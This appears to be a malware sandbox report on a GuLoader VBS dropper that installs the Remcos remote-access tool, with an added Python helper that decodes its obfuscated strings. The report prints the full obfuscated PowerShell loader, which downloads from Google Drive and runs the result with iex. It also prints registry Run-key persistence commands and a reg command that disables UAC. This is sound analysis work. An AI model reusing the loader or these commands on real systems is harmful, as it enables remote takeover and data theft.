Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\Remcos\remcos.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Biotron = "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\\kostbare\\').Storbyer;%Habilitcar% ($Assaults)" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-KQ00DZ = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Program Files (x86)\windows mail\wab.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-KQ00DZ = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Program Files (x86)\windows mail\wab.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 540 set thread context of 5104 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\windows mail\wab.exe N/A
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings C:\ProgramData\Remcos\remcos.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4492 wrote to memory of 2412 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 2412 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 4760 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2412 wrote to memory of 4760 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2412 wrote to memory of 540 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 540 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 540 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 3584 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 540 wrote to memory of 3584 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 540 wrote to memory of 3584 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 540 wrote to memory of 5104 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 540 wrote to memory of 5104 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 540 wrote to memory of 5104 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 540 wrote to memory of 5104 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 540 wrote to memory of 5104 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 5104 wrote to memory of 1360 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 5104 wrote to memory of 1360 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 5104 wrote to memory of 1360 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1360 wrote to memory of 2180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1360 wrote to memory of 2180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1360 wrote to memory of 2180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 5104 wrote to memory of 3164 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 5104 wrote to memory of 3164 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 5104 wrote to memory of 3164 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 5104 wrote to memory of 4232 N/A C:\Program Files (x86)\windows mail\wab.exe C:\ProgramData\Remcos\remcos.exe
PID 5104 wrote to memory of 4232 N/A C:\Program Files (x86)\windows mail\wab.exe C:\ProgramData\Remcos\remcos.exe
PID 5104 wrote to memory of 4232 N/A C:\Program Files (x86)\windows mail\wab.exe C:\ProgramData\Remcos\remcos.exe
PID 3164 wrote to memory of 1516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3164 wrote to memory of 1516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3164 wrote to memory of 1516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder 
Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble 
M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. 
Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder 
Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble 
M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. 
Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"
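The two powershell.exe command lines above (the 64-bit copy and the WOW64 copy run the same script) hide each real character at every 8th position of a junk string. `Causa` builds the method name `substring` at run time from `cmd /c set /A 115^^0` (115 XOR 0 is 115, the character code of `s`) plus the literal `ubstring`, then collects `$string.substring($i, 1)` for `$i` = 7, 15, 23, ... while `$i` is less than the string length minus one; `Arabs` dot-sources the decoded text through whatever `$Chuckstone` resolves to. The Python below is an added analyst helper written for this report, not code from the sandbox or from the sample. It reimplements that scheme and decodes four literals copied verbatim from the command line. One caveat a practitioner should know before reusing it on rendered pages: HTML collapses runs of spaces, and at least one literal on this page (the `Dda,yogI ...` string) decodes correctly only as far as `Import-Module` and then misaligns, so decode from the raw script or the sandbox's JSON export when a result looks wrong.

```python
from __future__ import annotations

import re

# Added analyst helper for the GuLoader PowerShell stage in this report; not sandbox or sample code.
# What `Causa` does in the script:
#   $Angami = [char][int](cmd /c set /A 115^^0)   ->  115 ^ 0 = 115  ->  's'
#   $Addys  = 's' + 'ubstring'                     ->  'substring'
#   for ($i = 7; $i -lt $string.Length - 1; $i += 8) { $out += $string.substring($i, 1) }
# `Arabs` then runs `. iex <decoded>` once $Chuckstone has been decoded.


def causa(junk: str, start: int = 7, step: int = 8) -> str:
    """Return the characters at positions start, start+step, ... strictly below len(junk)-1."""
    return ''.join(junk[i] for i in range(start, len(junk) - 1, step))


# Matches `Causa '...'` literals as they appear in the command line. The sample's literals
# contain no embedded quotes, so [^']* is sufficient for this script.
CAUSA_LITERAL_RE = re.compile(r"Causa\s+'([^']*)'")


def decode_causa_literals(script: str) -> list[str]:
    """Decode every `Causa '<junk>'` literal found in a fragment of the script."""
    return [causa(m.group(1)) for m in CAUSA_LITERAL_RE.finditer(script)]


# Literals copied verbatim from the powershell.exe command line in the Processes section.
FORKORTELSESTEGNENES = 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper '
CHUCKSTONE = 'Udsvejfi SelenaeTogfre.x Quadri '
PROWLER_ASSIGNMENT = 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield '
BREPILLEN = 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru '


def decoded_strings() -> dict[str, str]:
    """Decode the variables the first stage needs to fetch and stage its payload."""
    return {
        '$Forkortelsestegnenes': causa(FORKORTELSESTEGNENES),
        '$Chuckstone': causa(CHUCKSTONE),
        'Arabs #1 (Prowler)': causa(PROWLER_ASSIGNMENT),
        '$Brepillen': causa(BREPILLEN),
    }


if __name__ == '__main__':
    for name, value in decoded_strings().items():
        print(f'{name:24} {value}')
```

Decoding shows `$Chuckstone` is `iex`, the first `Arabs` call sets `$global:Prowler=$env:appdata` (the script then appends `\underbemanding.Bip` in clear text, so that is where the downloaded stage lands), `$Forkortelsestegnenes` is `Transferring`, and `$Brepillen` is a `https://drive.google.com/uc?export=download&id=...` URL, which matches the drive.google.com and drive.usercontent.google.com connections in the Network section.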

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Biotron" /t REG_EXPAND_SZ /d "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\kostbare\').Storbyer;%Habilitcar% ($Assaults)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Biotron" /t REG_EXPAND_SZ /d "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\kostbare\').Storbyer;%Habilitcar% ($Assaults)"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\ProgramData\Remcos\remcos.exe

"C:\ProgramData\Remcos\remcos.exe"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
